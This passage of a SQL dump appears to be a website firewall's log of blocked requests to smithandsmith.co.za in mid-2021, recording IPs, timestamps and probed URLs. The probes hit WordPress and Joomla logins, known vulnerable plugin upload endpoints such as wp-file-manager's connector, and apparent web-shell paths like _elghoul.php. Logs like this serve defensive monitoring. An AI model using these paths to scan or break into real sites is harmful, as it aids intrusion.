20:12:00','217.160.195.176','https://www.smithandsmith.co.za/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','404shield',''),(4157,'2021-06-29 16:38:15','72.167.42.45','https://smithandsmith.co.za/wp-login.php','404shield',''),(4158,'2021-06-29 17:53:35','152.67.52.194','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4159,'2021-06-30 23:18:17','139.99.69.189','https://smithandsmith.co.za/wp-login.php','404shield',''),(4160,'2021-07-01 00:01:43','188.166.214.213','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4161,'2021-07-01 01:23:12','40.87.89.85','http://www.smithandsmith.co.za/','muashield',''),(4162,'2021-07-01 01:23:13','40.87.89.85','http://www.smithandsmith.co.za/','muashield',''),(4163,'2021-07-01 01:23:17','40.87.89.85','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4164,'2021-07-01 03:01:59','40.87.89.85','http://www.smithandsmith.co.za/','muashield',''),(4165,'2021-07-01 03:02:03','40.87.89.85','http://www.smithandsmith.co.za/','muashield',''),(4166,'2021-07-01 03:02:03','40.87.89.85','http://www.smithandsmith.co.za/','muashield',''),(4167,'2021-07-02 14:40:51','148.72.207.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(4168,'2021-07-02 21:33:25','157.90.175.68','https://smithandsmith.co.za//wp-admin/install.php?step=1','404shield',''),(4169,'2021-07-02 21:33:30','157.90.175.68','https://smithandsmith.co.za//wp-admin/setup-config.php','404shield',''),(4170,'2021-07-02 21:33:37','157.90.175.68','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(4171,'2021-07-03 12:42:38','5.188.210.4','http://smithandsmith.co.za/js/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4172,'2021-07-03 16:17:41','5.188.210.4','http://smithandsmith.co.za/admin/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4173,'2021-07-03 17:16:08','209.145.59.137','https://smithandsmith.co.za/wp-login.php','404shield',''),(4174,'2021-07-03 18:08:58','145.131.25.253','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4175,'2021-07-03 18:13:59','85.17.88.170','https://smithandsmith.co.za/wp-login.php','404shield',''),(4176,'2021-07-03 18:47:27','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox-0.5.css','404shield',''),(4177,'2021-07-03 21:04:21','5.188.210.4','http://smithandsmith.co.za/admin/editor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4178,'2021-07-04 02:09:00','85.215.224.141','https://www.smithandsmith.co.za/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','404shield',''),(4179,'2021-07-04 02:09:50','85.215.224.141','https://www.smithandsmith.co.za/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','404shield',''),(4180,'2021-07-04 06:01:25','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox-0.5.css','404shield',''),(4181,'2021-07-04 08:11:06','5.188.210.4','http://smithandsmith.co.za/includes/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4182,'2021-07-04 12:22:35','5.188.210.4','http://smithandsmith.co.za/administrator/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4183,'2021-07-04 15:19:59','45.119.213.225','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4184,'2021-07-04 16:15:02','31.130.202.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(4185,'2021-07-04 18:19:08','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php','404shield',''),(4186,'2021-07-05 05:17:23','93.113.111.34','https://smithandsmith.co.za/wp-login.php','404shield',''),(4187,'2021-07-05 05:17:25','93.113.111.34','https://smithandsmith.co.za/wp-login.php','404shield',''),(4188,'2021-07-05 07:19:50','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php?file=tf2rghf.jpg','404shield',''),(4189,'2021-07-05 16:02:51','162.55.129.41','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4190,'2021-07-05 16:03:13','162.55.129.41','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4191,'2021-07-05 16:03:16','162.55.129.41','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4192,'2021-07-05 19:04:04','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/index.css','404shield',''),(4193,'2021-07-06 07:00:16','114.7.206.227','https://smithandsmith.co.za/wp-login.php','404shield',''),(4194,'2021-07-06 08:08:24','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/fluid_forms/file-upload/server/php/index.php?file=tf2rghf.jpg','404shield',''),(4195,'2021-07-06 15:57:55','103.132.124.120','https://smithandsmith.co.za/wp-login.php','404shield',''),(4196,'2021-07-06 17:13:20','5.188.210.4','https://smithandsmith.co.za/wp-content/uploads/upload_index.php?auth=hash','404shield',''),(4197,'2021-07-06 20:37:31','5.188.210.4','https://smithandsmith.co.za/wp-content/uploads/upload_index.php?auth=hash','404shield',''),(4198,'2021-07-07 10:14:30','31.14.161.244','https://smithandsmith.co.za/wp-login.php','404shield',''),(4199,'2021-07-07 19:18:06','31.202.101.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(4200,'2021-07-07 19:36:40','103.111.58.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(4201,'2021-07-07 19:36:40','103.111.58.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(4202,'2021-07-07 21:36:10','37.49.230.208','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(4203,'2021-07-08 06:57:30','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php','404shield',''),(4204,'2021-07-08 09:16:10','103.229.42.95','https://smithandsmith.co.za/wp-login.php','404shield',''),(4205,'2021-07-08 18:36:44','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.css','404shield',''),(4206,'2021-07-08 19:03:40','142.54.177.6','https://www.smithandsmith.co.za//wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','404shield',''),(4207,'2021-07-09 06:58:11','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/arcadepress/php/upload.php','404shield',''),(4208,'2021-07-09 07:43:58','40.124.128.49','http://www.smithandsmith.co.za/','muashield',''),(4209,'2021-07-09 07:43:58','40.124.128.49','http://www.smithandsmith.co.za/','muashield',''),(4210,'2021-07-09 07:44:00','40.124.128.49','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4211,'2021-07-09 07:58:42','41.10.7.72','https://smithandsmith.co.za/administrator/index.php?option=com_admintools','adminpw',''),(4212,'2021-07-09 18:14:46','104.197.75.152','https://smithandsmith.co.za/wp-login.php','404shield',''),(4213,'2021-07-09 18:49:39','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/SqueezeTheme/uploads/upload.php','404shield',''),(4214,'2021-07-10 00:00:03','92.118.77.10','http://smithandsmith.co.za/contact/','httpbl',''),(4215,'2021-07-10 00:00:04','92.118.77.10','http://smithandsmith.co.za/','httpbl',''),(4216,'2021-07-10 00:00:04','92.118.77.10','http://smithandsmith.co.za/','httpbl',''),(4217,'2021-07-10 06:47:57','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/php/upload.php','404shield',''),(4218,'2021-07-10 09:55:35','92.118.77.10','http://smithandsmith.co.za/contact/','httpbl',''),(4219,'2021-07-10 09:55:36','92.118.77.10','http://smithandsmith.co.za/','httpbl',''),(4220,'2021-07-10 09:55:37','92.118.77.10','http://smithandsmith.co.za/','httpbl',''),(4221,'2021-07-10 18:46:52','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/SqueezeTheme/style.css','404shield',''),(4222,'2021-07-10 22:54:03','105.66.134.61','http://www.smithandsmith.co.za/','muashield',''),(4223,'2021-07-10 22:54:05','105.66.134.61','http://www.smithandsmith.co.za/','muashield',''),(4224,'2021-07-10 22:54:11','105.66.134.61','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4225,'2021-07-11 00:16:51','109.164.196.19','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(4226,'2021-07-11 07:29:00','162.214.93.227','https://smithandsmith.co.za/wp-login.php','404shield',''),(4227,'2021-07-11 17:00:37','45.12.19.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(4228,'2021-07-11 17:00:37','45.12.19.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(4229,'2021-07-11 17:00:37','45.12.19.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(4230,'2021-07-11 19:38:53','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/content/upload.php','404shield',''),(4231,'2021-07-11 23:19:56','213.159.209.230','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4232,'2021-07-12 01:46:13','3.235.251.41','https://www.smithandsmith.co.za/wp-content/upload','404shield',''),(4233,'2021-07-12 08:27:20','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/php/index.php?file=tf2rghf.jpg','404shield',''),(4234,'2021-07-12 14:30:06','51.103.84.174','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(4235,'2021-07-12 15:44:17','34.94.117.238','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(4236,'2021-07-12 15:44:20','34.94.117.238','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4237,'2021-07-12 15:44:22','34.94.117.238','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(4238,'2021-07-12 15:53:29','54.159.21.237','https://www.smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4239,'2021-07-12 15:54:16','54.159.21.237','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4240,'2021-07-12 15:54:26','54.159.21.237','https://www.smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4241,'2021-07-12 17:39:08','213.159.209.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(4242,'2021-07-12 17:39:08','213.159.209.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(4243,'2021-07-12 20:38:37','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css','404shield',''),(4244,'2021-07-13 07:28:32','74.91.8.36','https://smithandsmith.co.za/wp-admin/install.php?step=2','404shield',''),(4245,'2021-07-13 08:14:47','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/js/main.js','404shield',''),(4246,'2021-07-13 12:15:50','45.72.78.41','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(4247,'2021-07-13 12:15:56','45.72.78.41','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(4248,'2021-07-13 12:16:02','45.72.78.41','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(4249,'2021-07-13 19:41:15','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(4250,'2021-07-14 00:16:15','152.171.230.23','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(4251,'2021-07-14 07:58:54','35.228.237.163','https://smithandsmith.co.za/wp-login.php','404shield',''),(4252,'2021-07-14 09:51:55','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(4253,'2021-07-15 03:16:10','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/fluid_forms/file-upload/server/php/index.php?file=tf2rghf.jpg','404shield',''),(4254,'2021-07-15 05:02:30','208.113.170.116','https://smithandsmith.co.za/wp-login.php','404shield',''),(4255,'2021-07-15 06:19:52','141.85.216.231','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4256,'2021-07-15 14:34:49','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/php/index.php?file=tf2rghf.jpg','404shield',''),(4257,'2021-07-15 19:39:54','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php','404shield',''),(4258,'2021-07-16 00:32:45','5.188.62.76','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4259,'2021-07-16 07:20:39','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','404shield',''),(4260,'2021-07-16 07:26:48','103.85.162.26','http://smithandsmith.co.za/contact/','httpbl',''),(4261,'2021-07-16 09:27:36','102.129.145.12','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4262,'2021-07-16 09:27:37','102.129.145.12','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4263,'2021-07-16 17:10:12','79.133.175.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(4264,'2021-07-16 17:10:12','79.133.175.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(4265,'2021-07-16 17:10:12','79.133.175.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(4266,'2021-07-16 17:10:13','79.133.175.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(4267,'2021-07-16 17:10:13','79.133.175.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(4268,'2021-07-16 17:10:13','79.133.175.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(4269,'2021-07-16 17:10:13','79.133.175.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(4270,'2021-07-16 18:06:25','31.207.33.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(4271,'2021-07-16 22:25:22','105.156.212.67','http://www.smithandsmith.co.za/','muashield',''),(4272,'2021-07-16 22:25:26','105.156.212.67','http://www.smithandsmith.co.za/','muashield',''),(4273,'2021-07-16 22:25:32','105.156.212.67','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4274,'2021-07-17 00:47:19','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','404shield',''),(4275,'2021-07-17 02:46:56','198.12.248.244','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4276,'2021-07-17 07:26:14','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/','404shield',''),(4277,'2021-07-17 16:50:22','72.167.46.203','https://smithandsmith.co.za/wp-login.php','404shield',''),(4278,'2021-07-18 00:30:38','185.220.102.240','https://www.smithandsmith.co.za/.git/config','httpbl',''),(4279,'2021-07-18 00:30:41','91.234.99.189','https://smithandsmith.co.za/.git/config','httpbl',''),(4280,'2021-07-18 00:36:12','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/','404shield',''),(4281,'2021-07-18 06:55:43','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(4282,'2021-07-18 13:37:39','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(4283,'2021-07-18 15:21:20','82.165.99.175','https://www.smithandsmith.co.za/wp-content/upload','404shield',''),(4284,'2021-07-18 19:08:58','82.165.99.175','https://www.smithandsmith.co.za/wp-content/mail.php','404shield',''),(4285,'2021-07-19 08:53:22','124.122.5.102','http://smithandsmith.co.za/administrator/','adminpw',''),(4286,'2021-07-19 08:53:27','124.122.5.102','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(4287,'2021-07-19 08:53:33','124.122.5.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(4288,'2021-07-19 08:53:44','199.249.230.156','http://smithandsmith.co.za/administrator/','adminpw',''),(4289,'2021-07-19 08:53:55','109.70.100.35','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(4290,'2021-07-19 08:54:04','185.191.124.151','https://smithandsmith.co.za/wp-login.php','404shield',''),(4291,'2021-07-19 15:06:33','217.182.129.156','https://smithandsmith.co.za/wp-login.php','404shield',''),(4292,'2021-07-19 19:24:36','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(4293,'2021-07-19 19:55:21','18.185.148.20','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(4294,'2021-07-20 02:36:40','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(4295,'2021-07-20 12:08:30','150.136.58.98','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(4296,'2021-07-20 14:06:00','3.18.31.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(4297,'2021-07-20 17:55:55','103.127.30.241','https://smithandsmith.co.za/wp-login.php','404shield',''),(4298,'2021-07-20 17:55:55','103.127.30.241','https://smithandsmith.co.za/wp-login.php','404shield',''),(4299,'2021-07-20 19:35:20','150.136.58.98','https://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(4300,'2021-07-21 06:12:15','185.220.102.242','https://smithandsmith.co.za/contact','httpbl',''),(4301,'2021-07-21 06:12:16','185.220.102.242','https://smithandsmith.co.za/','httpbl',''),(4302,'2021-07-22 04:18:26','166.62.124.228','https://smithandsmith.co.za/wp-login.php','404shield',''),(4303,'2021-07-22 04:18:26','166.62.124.228','https://smithandsmith.co.za/wp-login.php','404shield',''),(4304,'2021-07-22 10:15:16','185.220.100.252','https://smithandsmith.co.za/contact?rCH=2','httpbl',''),(4305,'2021-07-22 10:15:18','185.220.100.252','https://smithandsmith.co.za/contact','httpbl',''),(4306,'2021-07-22 10:15:19','185.220.100.252','https://smithandsmith.co.za/','httpbl',''),(4307,'2021-07-22 13:10:05','14.42.254.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(4308,'2021-07-22 13:10:12','14.42.254.235','http://smithandsmith.co.za/administrator/','adminpw',''),(4309,'2021-07-22 20:31:21','51.75.195.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(4310,'2021-07-22 22:18:39','174.138.61.203','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4311,'2021-07-23 12:23:42','23.228.109.147','http://smithandsmith.co.za/administrator/index.php?option=com_acym&ctrl=frontmails&task=setNewIconShare','adminpw',''),(4312,'2021-07-23 12:23:42','23.228.109.147','http://smithandsmith.co.za/administrator/index.php?option=com_acym&ctrl=frontmails&task=setNewIconShare','adminpw',''),(4313,'2021-07-23 12:23:42','23.228.109.147','http://smithandsmith.co.za/administrator/index.php?option=com_acym&ctrl=frontmails&task=setNewIconShare','adminpw',''),(4314,'2021-07-24 09:11:59','204.44.88.35','https://smithandsmith.co.za/wp-login.php','404shield',''),(4315,'2021-07-24 12:59:39','148.72.22.169','https://smithandsmith.co.za/wp-login.php','404shield',''),(4316,'2021-07-25 03:35:34','159.224.255.154','http://smithandsmith.co.za/contact/','httpbl',''),(4317,'2021-07-25 03:35:42','159.224.255.154','http://smithandsmith.co.za/','httpbl',''),(4318,'2021-07-25 03:35:44','159.224.255.154','http://smithandsmith.co.za/index.php?option=com_easyblog&view=dashboard&layout=write','httpbl',''),(4319,'2021-07-26 02:18:47','134.122.7.184','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4320,'2021-07-26 02:19:50','134.122.7.184','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4321,'2021-07-26 02:20:08','134.122.7.184','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4322,'2021-07-26 06:17:17','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(4323,'2021-07-26 09:38:08','167.172.231.219','https://smithandsmith.co.za/wp-login.php','404shield',''),(4324,'2021-07-26 14:40:18','106.53.115.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(4325,'2021-07-26 14:40:22','106.53.115.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(4326,'2021-07-26 19:38:38','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(4327,'2021-07-27 12:14:23','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(4328,'2021-07-27 14:52:01','41.10.128.42','https://smithandsmith.co.za/administrator/','adminpw',''),(4329,'2021-07-27 16:33:53','54.244.25.177','https://www.smithandsmith.co.za//wp-admin/1.php','404shield',''),(4330,'2021-07-27 16:34:06','54.244.25.177','https://www.smithandsmith.co.za//wp-admin/3.php','404shield',''),(4331,'2021-07-27 16:34:23','54.244.25.177','https://www.smithandsmith.co.za//wp-admin/leaf.php','404shield',''),(4332,'2021-07-27 18:39:09','35.199.33.157','https://smithandsmith.co.za/wp-login.php','404shield',''),(4333,'2021-07-27 21:09:17','54.244.25.177','https://www.smithandsmith.co.za/wp-content/1.php','404shield',''),(4334,'2021-07-27 21:09:21','54.244.25.177','https://www.smithandsmith.co.za/wp-content/3.php','404shield',''),(4335,'2021-07-27 21:09:25','54.244.25.177','https://www.smithandsmith.co.za/wp-content/leaf.php','404shield',''),(4336,'2021-07-28 02:03:25','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(4337,'2021-07-28 08:23:51','194.163.154.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(4338,'2021-07-28 09:07:57','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/files/_elghoul.php?0=UP','404shield',''),(4339,'2021-07-28 14:30:05','37.0.8.22','http://smithandsmith.co.za//administrator/index.php','adminpw',''),(4340,'2021-07-29 03:42:51','8.210.116.184','https://smithandsmith.co.za/wp-login.php','404shield',''),(4341,'2021-07-29 03:42:51','8.210.116.184','https://smithandsmith.co.za/wp-login.php','404shield',''),(4342,'2021-07-29 09:32:00','185.220.102.250','https://smithandsmith.co.za/wp-login.php','404shield',''),(4343,'2021-07-29 09:32:03','185.220.102.250','https://smithandsmith.co.za/wp-login.php','404shield',''),(4344,'2021-07-29 09:32:05','185.220.102.250','https://smithandsmith.co.za/wp-login.php','404shield',''),(4345,'2021-07-29 18:10:06','178.128.68.121','https://smithandsmith.co.za/wp-login.php','404shield',''),(4346,'2021-07-29 19:02:16','178.62.77.224','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4347,'2021-07-30 04:34:04','210.96.184.152','https://smithandsmith.co.za/wp-login.php','404shield',''),(4348,'2021-07-30 04:34:09','210.96.184.152','http://smithandsmith.co.za/administrator/','adminpw',''),(4349,'2021-07-30 14:36:29','193.122.144.138','https://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(4350,'2021-07-31 00:16:24','138.197.100.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(4351,'2021-07-31 00:16:24','138.197.100.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(4352,'2021-07-31 00:16:47','64.227.58.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(4353,'2021-07-31 00:16:47','64.227.58.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(4354,'2021-07-31 00:16:47','64.227.58.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(4355,'2021-07-31 00:16:47','64.227.58.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(4356,'2021-07-31 00:16:47','64.227.58.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(4357,'2021-07-31 07:18:05','192.163.197.220','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4358,'2021-07-31 11:57:17','54.244.25.177','https://www.smithandsmith.co.za/wp-admin/alf.php','404shield',''),(4359,'2021-07-31 11:57:21','54.244.25.177','https://www.smithandsmith.co.za/wp-admin/wp-settings.php','404shield',''),(4360,'2021-07-31 11:57:26','54.244.25.177','https://www.smithandsmith.co.za/wp-admin/2.php','404shield',''),(4361,'2021-08-01 16:52:32','204.44.88.35','https://smithandsmith.co.za/wp-login.php','404shield',''),(4362,'2021-08-02 10:13:16','65.21.145.128','https://smithandsmith.co.za/wp-login.php','404shield',''),(4363,'2021-08-02 18:04:34','160.16.141.232','https://smithandsmith.co.za/wp-login.php','404shield',''),(4364,'2021-08-02 18:04:34','160.16.141.232','https://smithandsmith.co.za/wp-login.php','404shield',''),(4365,'2021-08-04 00:47:43','91.205.174.96','https://smithandsmith.co.za/wp-admin/install.php?step=2','404shield',''),(4366,'2021-08-04 00:47:45','91.205.174.96','https://smithandsmith.co.za/wp-admin/setup-config.php?step=1','404shield',''),(4367,'2021-08-04 10:46:51','104.244.79.203','https://smithandsmith.co.za/wp-login.php','404shield',''),(4368,'2021-08-04 10:46:54','104.244.79.203','https://smithandsmith.co.za/wp-login.php','404shield',''),(4369,'2021-08-04 10:46:57','104.244.79.203','https://smithandsmith.co.za/wp-login.php','404shield',''),(4370,'2021-08-04 16:12:38','150.136.58.98','https://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(4371,'2021-08-04 19:19:58','142.44.251.105','https://smithandsmith.co.za/wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','404shield',''),(4372,'2021-08-05 10:19:11','104.244.72.123','https://smithandsmith.co.za/wp-login.php','404shield',''),(4373,'2021-08-05 10:19:13','104.244.72.123','https://smithandsmith.co.za/wp-login.php','404shield',''),(4374,'2021-08-05 10:19:15','104.244.72.123','https://smithandsmith.co.za/wp-login.php','404shield',''),(4375,'2021-08-05 13:44:31','78.190.155.202','http://smithandsmith.co.za/administrator/','adminpw',''),(4376,'2021-08-05 13:44:34','78.190.155.202','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(4377,'2021-08-05 13:44:38','78.190.155.202','https://smithandsmith.co.za/wp-login.php','404shield',''),(4378,'2021-08-05 13:44:46','185.220.102.251','http://smithandsmith.co.za/administrator/','adminpw',''),(4379,'2021-08-05 13:44:55','82.223.14.245','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(4380,'2021-08-05 13:45:06','37.123.163.58','https://smithandsmith.co.za/wp-login.php','404shield',''),(4381,'2021-08-05 13:45:11','185.107.47.171','http://smithandsmith.co.za/admin.php','httpbl',''),(4382,'2021-08-05 13:45:14','91.219.236.197','http://smithandsmith.co.za/admin','httpbl',''),(4383,'2021-08-05 13:45:23','185.107.47.171','https://smithandsmith.co.za/admin/','httpbl',''),(4384,'2021-08-05 16:23:34','185.165.116.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(4385,'2021-08-06 06:10:46','143.244.186.99','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4386,'2021-08-07 00:51:48','45.12.138.168','https://www.smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4387,'2021-08-07 00:52:05','45.12.138.168','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4388,'2021-08-07 00:52:09','45.12.138.168','https://www.smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4389,'2021-08-07 05:10:36','203.159.80.220','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4390,'2021-08-07 09:48:55','45.139.102.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(4391,'2021-08-07 16:40:16','18.134.196.50','https://www.smithandsmith.co.za/wp-content/upload.php','404shield',''),(4392,'2021-08-07 17:42:54','37.0.11.111','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4393,'2021-08-07 17:44:53','37.0.11.111','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4394,'2021-08-07 17:45:14','37.0.11.111','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4395,'2021-08-08 06:30:10','185.220.100.248','https://smithandsmith.co.za/contact','httpbl',''),(4396,'2021-08-08 06:30:12','185.220.100.248','https://smithandsmith.co.za/','httpbl',''),(4397,'2021-08-08 07:45:52','68.183.157.57','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4398,'2021-08-08 07:46:20','68.183.157.57','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4399,'2021-08-08 13:10:47','150.136.213.184','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(4400,'2021-08-08 14:36:07','178.128.51.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(4401,'2021-08-08 19:10:03','150.136.213.184','https://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(4402,'2021-08-09 04:55:56','150.136.213.184','https://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(4403,'2021-08-09 12:27:08','45.153.160.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(4404,'2021-08-09 12:27:12','45.153.160.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(4405,'2021-08-09 12:27:15','45.153.160.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(4406,'2021-08-09 16:29:16','138.197.100.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(4407,'2021-08-09 16:29:16','138.197.100.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(4408,'2021-08-09 